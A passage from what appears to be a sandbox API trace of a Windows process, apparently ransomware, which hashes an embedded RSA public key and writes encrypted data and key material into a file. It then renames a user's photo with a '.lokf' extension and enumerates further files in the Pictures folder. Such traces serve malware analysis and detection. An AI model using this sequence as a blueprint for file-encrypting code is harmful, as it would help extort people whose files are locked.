KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.095] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.096] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.096] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.096] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.096] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.096] GetLastError () returned 0x0 [0059.096] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.096] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.096] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.096] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.096] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfc00) returned 0x9c83710 [0059.096] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83190 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3d0 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c831d8 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3e8 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b418 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b430 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.097] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b418 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b430 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b430 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b418 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b430 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b418 | out: hHeap=0x660000) returned 1 [0059.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.098] GetCurrentThreadId () returned 0x9e0 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7db68 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.098] GetCurrentThreadId () returned 0x9e0 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b418 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b430 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b400 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b448 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b418 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b418 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b418 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.100] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b430 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b400 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3e8 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c831d8 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.101] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0xfbf0, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0xfbf0, lpOverlapped=0x0) returned 1 [0059.101] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.102] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfbf5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.102] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.102] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.102] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.102] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.102] CloseHandle (hObject=0x5cc) returned 1 [0059.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0059.103] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\b7pJttHK9Z.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b7pjtthk9z.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\b7pJttHK9Z.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b7pjtthk9z.jpg.lokf")) returned 1 [0059.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.104] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.105] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.105] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0059.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.105] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8225370, ftCreationTime.dwHighDateTime=0x1d4d226, ftLastAccessTime.dwLowDateTime=0x67fb63a0, ftLastAccessTime.dwHighDateTime=0x1d4cd90, ftLastWriteTime.dwLowDateTime=0x67fb63a0, ftLastWriteTime.dwHighDateTime=0x1d4cd90, nFileSizeHigh=0x0, 